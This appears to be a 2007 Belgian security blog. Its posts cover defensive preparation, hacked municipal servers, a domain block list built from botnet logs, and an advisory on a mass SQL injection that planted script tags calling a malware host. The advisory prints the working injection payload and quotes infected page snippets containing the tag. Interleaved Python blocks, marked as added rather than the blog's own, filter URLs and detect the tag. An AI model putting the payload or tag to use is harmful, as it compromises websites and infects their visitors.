08-11-07

Do not panic, but think, plan and act

So we are not saying that this weekend the internet and the world will come down; we are only saying that there is an increase in attacks on the Belgian internet and that the announced and overhyped jihad cyberattack is just another negative stream that will happen this weekend.

So, just as in the old days, before you go home and leave your network alone, you:

* close down the gateways of your network and make sure there is no stupid or default password on external servers

* patch, upgrade, firewall, antivirus, backup and monitor your external servers

* make a list of all the people you should call if there is a virus infection, a DDoS or a hack

And if you really are in for some fun, you run an exercise about it. What would you do if on Sunday you were attacked by a virtual DDoS, and how long does it take to set things in motion?

Better be prepared than be sorry, or end up on http://be-hacked.skynetblogs.be and on the news.

17:43 Posted by technology changes fast not a lot in Algemeen

Update: can you still trust antwerpen.be servers?

The antwerpen.be infrastructure was already hacked before and has now been hacked again, and according to this article some servers are still running IIS 4.0 and NT.

I didn't want to expose this, in the hope that they would upgrade or something, but they can get hacked big time now that they didn't upgrade. They didn't even outsource the hosting of the sites in the meantime.

They keep these websites online running IIS 4 and put networks, back office and related sites and their users in danger (read the article below about new viruses distributed by hacked servers).

This is their network: http://www.robtex.com/dns/antwerpen.be.html

If you find yourself on this list, make sure that you have no trust relationship with those servers that were hacked; in fact, think about whether you want to have anything to do with any of those servers that have no security review whatsoever and are put up on IIS 4.0 as if it were the most normal thing to do.

As long as we don't have IT security laws and audits around here, your only defense is to be as selective as necessary in choosing whom you will trust and with whom you will share common DNS and mail servers and so on. Keep in mind that this weekend is hyped as being dangerous, with all kinds of attacks brewing around here.

Trust is fine, control is better

11:05 Posted by technology changes fast not a lot in Algemeen

A lesson in blacklisting and whitelisting

I received a listing of sites that are involved in a botnet/rootkit/zero-day attack on the network of a reader of this blog. If you have logs like this, send them to the central international coordination center at http://isc.sans.org; they even have a tool that sends them automatically.

But I thought I would take the logfile and construct a block-blacklist out of it, and maybe teach you something about how to set up such a list when you are confronted with such an event (as antivirus and antimalware tools are sometimes helpless for days or weeks before being able to defend you against the new tricks online).

It is clear from the attack that it is based on scripts and lists that are online and that are being placed on websites that maybe don't know that they are a vehicle for such a zombie attack against others (even if it could lead to financial damages under European law; tell this to your boss if he wants to diminish your security budget).

So we have to limit the outgoing HTTP traffic of the computers on your network towards those sites or domains, just to be sure that if a machine gets infected it can't get its contacts or updates from the network infrastructure of the botnet.

The first thing to do is to select the domain names that come from dangerous cyber-countries with which you have no relation or business contacts. Here you should change from blacklisting domains to whitelisting sites (everything is blocked except these sites). Put a phone number on your intranet where people can ask to whitelist a site for 'business reasons'.

The second thing to block, if you are in a business network, are the free hosters that clearly have no security service or don't care a bit, and that are distributing malware and are zombie-infected. Most of the free hosters seen in this attack are already in other blacklists for this.

The third thing is the list of the rest of the sites. In a good proxy you should be able to have a blacklist as long as you wish without any effect on your speed. You can also use other services, but you should test them first and count the false negatives.

Some years ago the specialists laughed at URL filtering and said it was useless; now it has become a necessary component of a fast response against new and fast-moving attacks. It also has a good impact on your defenses because they just need to drop the traffic, not analyse it. So if you have a DDoS and you know where it comes from and it is repeatedly from the same sources, this will help (remember 11/11).

If your users have nothing to do in the following countries, just block them.

These domains are really high risk and should be blacklisted, with individual destinations whitelisted:
*.ru Russia
*.ro Romania
*.us not much used by US states
*.tm not a country domain, but spammy
*.by Belarus

These are other domains to consider blocking:

*.tw Taiwan
*.cl Chile
*.to Tonga

It is much more difficult to block .nl, .org, .it, .de and so on.

Free web-space hosters: blocking those can block some normal sites; the question is whether users may go to personal sites.

ifrance.com
geocities.com
ifreepages.com
bravehost.com
100webspace.net

Sites

Some proxies and blocking tools want you to put a . or *. before the domain name.

You use this at your own risk. I am not responsible if you use it without testing. It doesn't necessarily mean that any contact with these domains shows an infection. It just gives you less work, so you don't have to change the link, the domain, the way it is written or the IP address. Do not use this for other protocols like SMTP.
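The three tiers described above (blocked country TLDs with whitelisted exceptions, blocked free hosters, then individual sites) as a small policy evaluator, written as an added example and not code from this blog; the whitelist entry and the tier-3 site names are constructed placeholders, and the TLD and free-hoster entries are the ones listed in the post. render() emits the list in the "." or "*." prefix form that some proxies expect.

```python
# Added example (not from the blog): three-tier outbound HTTP policy.
from typing import List, Tuple

BLOCKED_TLDS = {"ru", "ro", "us", "tm", "by"}          # tier 1, from the post
WHITELIST = {"partner.example.ru"}                     # constructed exception
FREE_HOSTERS = {"ifrance.com", "geocities.com", "ifreepages.com",
                "bravehost.com", "100webspace.net"}    # tier 2, from the post
BLOCKED_SITES = {"bad-site.example", "other-bad.example"}  # tier 3, constructed

def in_domain(host: str, domain: str) -> bool:
    """True when host is the domain itself or any subdomain of it."""
    return host == domain or host.endswith("." + domain)

def decide(host: str) -> Tuple[str, str]:
    """Return ('allow'|'block', reason). The whitelist wins, so review it carefully."""
    host = host.strip().lower().rstrip(".")
    if any(in_domain(host, w) for w in WHITELIST):
        return "allow", "whitelisted"
    tld = host.rsplit(".", 1)[-1]
    if tld in BLOCKED_TLDS:                      # tier 1: whole country TLD
        return "block", "tld:" + tld
    for hoster in sorted(FREE_HOSTERS):          # tier 2: hoster and all its subdomains
        if in_domain(host, hoster):
            return "block", "free-hoster:" + hoster
    for site in sorted(BLOCKED_SITES):           # tier 3: individual sites from the log
        if in_domain(host, site):
            return "block", "site:" + site
    return "allow", "default"

def render(style: str = "dot") -> List[str]:
    """Emit the block list as '.domain' or '*.domain' lines for a proxy."""
    prefix = {"dot": ".", "star": "*."}[style]
    return [prefix + e for e in sorted(BLOCKED_TLDS) + sorted(FREE_HOSTERS | BLOCKED_SITES)]

if __name__ == "__main__":
    for h in ["www.shop.ru", "partner.example.ru", "me.geocities.com", "www.google.be"]:
        print(h, decide(h))
    print("\n".join(render("star")))
```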

Your input is always welcome

10:36 Posted by technology changes fast not a lot in Algemeen

BETTER BE PREPARED THAN BE SORRY

BOTNETS _ TURKISH HACKERS _ DDOS _ PHISHING _ VIRUS INSERTS_STORM WORM

And we should act as if everything is normal, there is nothing to worry about and there is nothing that should be done......

01:19 Posted by technology changes fast not a lot in Algemeen

Also Belgian sites infected with virus after hack

According to the Internet Storm Center (the thing that our politicians don't want to set up in Belgium even though they agreed to put it into the Telecom law; it is apparently much more important to squabble about BHV while your critical communication infrastructure is being attacked inside out, without the capabilities to respond effectively) there is an important and dangerous infection and password-stealing script being placed on more than 40,000 websites already. They are busy trying to mobilise everybody to clean it up, but I think you should also do your own part and protect your network and your server.

First, you should block at your firewall and all other filters every connection to yl18.net/0.js. Do not hesitate to do this. It is absolutely necessary.

Secondly, if you have a website: the attacks for the moment use an SQL injection, and this is the attack code (the URL is defanged here as "hxxp" with a space in the host name):

-- Builds one UPDATE per varchar column of every user table, each appending
-- the script tag to the column's existing value, then executes them all.
declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="hxxp://yl 18.net/0.js"></script>'';'
  from dbo.sysobjects a, dbo.syscolumns b, dbo.systypes c
  where a.id=b.id and a.xtype='U' and b.xtype=c.xtype and c.name='varchar';
-- Reverse, cut at the first ';' and reverse back: this drops whatever
-- statement was cut off when the 8000-character buffer overflowed.
set @m=REVERSE(@m);
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);

and it does this on as many pages of the website as it can find.
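Because the injected string lands in every varchar column, it ends up in page titles, forum posts and news headlines, exactly as the search snippets below show. This added example (my code, not from the blog or the Internet Storm Center) finds every externally sourced script tag in a page, flags the yl18.net host the post tells you to block, handles the doubled "<script src=<script src=" form that appears when a page was injected twice, and strips the bad tags; the sample pages are constructed from the snippets quoted in the post.

```python
# Added example (not from the blog): detect and strip the injected script tag.
import re
from typing import List, Tuple

# Matches an external script tag, including the doubled "<script src=<script src="
# form that shows up when the injection ran twice over the same column.
TAG = re.compile(
    r'(?:<script\s+src=)*<script\s+src=["\']?'
    r'(https?://([^/"\'>\s]+)[^"\'>\s]*)["\']?\s*>\s*</script>',
    re.IGNORECASE)

KNOWN_BAD = {"yl18.net"}   # the host the post says to block at the firewall

def find_external_scripts(html: str, trusted: set) -> List[Tuple[str, str]]:
    """Return (host, src) for every script tag whose host is not in trusted."""
    hits = []
    for m in TAG.finditer(html):
        src, host = m.group(1), m.group(2).lower()
        if host not in trusted:
            hits.append((host, src))
    return hits

def is_infected(html: str) -> bool:
    """True when any script tag points at a host on the known-bad list."""
    return any(h in KNOWN_BAD for h, _ in find_external_scripts(html, set()))

def clean(html: str, bad_hosts: set = frozenset(KNOWN_BAD)) -> str:
    """Strip tags for the bad hosts only; scripts from other hosts are left alone."""
    return TAG.sub(lambda m: "" if m.group(2).lower() in bad_hosts else m.group(0), html)

# Constructed samples modelled on the search snippets quoted in the post.
SAMPLES = {
    "company": 'Futurestep - a Korn/Ferry Comp<script src="http://yl18.net/0.js"></script>any',
    "double":  'Overview<script src=<script src="http://yl18.net/0.js"></script>',
    "forum":   'Research method presentation<script src="http://yl18.net/0.js"></script>, New Topic',
    "clean":   '<p>Hello</p><script src="https://www.example.test/app.js"></script>',
}

if __name__ == "__main__":
    for name, page in SAMPLES.items():
        print(name, is_infected(page), repr(clean(page)))
```

Run the same check over a dump of your varchar columns, not just over rendered pages, since the injection lives in the database and is re-served on every request.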

The Internet Storm Center calls on all ISPs to take out and clean up websites that are hijacked and injected with this code. In Belgium a simple Google trick already showed some Belgian sites being infected. DO NOT VISIT THEM.

Futurestep - a Korn/Ferry Comp<script src="http://yl18.net/0.js ... (www.futurestep.be/)

KornFerry Overview<script src=<script src="http://yl18.net/0.js ... and the whole of www.kornferry.com/

If you have a forum you should block all script possibilities, otherwise you will infect your users.

Student Psychology - Research method presentation<script src="http ...
Research method presentation<script src="http://yl18.net/0.js"></script>, New Topic · Reply to
www.psypress.com/student/forum/topic.asp?TOPIC_ID=69

It is even being introduced as an additional news page on news sites, as here; look at the name of the page:

Technology Group International<script src="http://yl18.net/0.js ...
The newest version of Enterprise 21 offers significant enhancements designed to improve
www.manubiz.com/channel/news.asp?news=H4ED8KE9

And it is domains from all over the world that are being attacked, from tn (Tunisia) to uk to org to com and so on.

A Google search for the script shows 50,000 pages; this is already more than 10,000 new pages since the Internet Storm Center launched its alert.

I think this will be spreading even more, and it seems that antiviruses aren't very effective for now.

And if you thought that professional sites had professional security, think again:

Organon International Inc. Profile
LEUVEN, Belgium, January 15 /PRNewswire/ -- "http://yl18.net/0.js">. Website:, http://www.organon.com ...
www.smartbrief.com/news/AABB/companyData.jsp?companyId=18199

I am sure that the Internet Storm Center will follow up on the story:

http://www.incidents.org/diary.html?storyid=3621

We will also.


00:45 Posted by technology changes fast not a lot in Algemeen

07-11-07

Hack of the day: antwerpen.be (updated)

They have been replaced this morning, but yesterday they were hacked, and this shows for important hosters nowadays the importance of permanent monitoring.

I WILL REPEAT THIS OVER AND OVER AGAIN: IF YOU WERE ALREADY HACKED BEFORE, YOU WILL BE ATTACKED OVER AND OVER AGAIN, AND YOU WILL BE HACKED AGAIN IF YOU LET DOWN YOUR GUARD.

ocmw.antwerpen.be/ Hacked By PowerDream
antwerpen.be Hacked By PowerDream
Update: the question is of course whether they have analyzed what happened and whether they have taken action to fix the hole and to better defend their machine, or to migrate. I am not going to scan their machines, that would be totally illegal, but I would, if I were them, scan their servers with the three most popular attack tools from outside the network as a 'black box' test. The three tools to use are Metasploit, nmap and Nessus.
If there are still people who don't believe that a Turkish hacking campaign is under way and still don't have the guts to do something, it is becoming time, because if antwerpen.be falls then either the antwerpen.be IT guys are a bunch of irresponsible amateurs or the hackers really know what they are doing. So control your servers, control your logs, make backups, close down access for people who don't really need it, and upgrade and patch everything that you have forgotten to do lately.
Technical note: there are problems with the RSS feeds from furl.net and they have been informed. We hope to have clean RSS feeds when the problem is solved, and we hope this will be soon. For the moment the published feeds take all the headlines, not only those from the chosen categories.

23:29 Posted by technology changes fast not a lot in Algemeen

ING first to massively replace its workers by call centers

ING is moving in Belgium from brick-and-mortar banks to web banks and for this reason will put more than 800 people out of a job. They will take on others, but these will have to work in a call center and will probably be paid less. So you don't have to go to India to lower working standards.

So if you only do web banking or self-checkout at your supermarket, don't be surprised afterwards that the not-so-intelligent won't find a job any more. And don't be surprised either if you find out afterwards that the web service won't stay cheap or free or as safe as they say.... You already have fewer consumer rights with online banking than with paper.

Read 'Player Piano' by Kurt Vonnegut (google: "player piano" vonnegut).

15:06 Posted by technology changes fast not a lot in Algemeen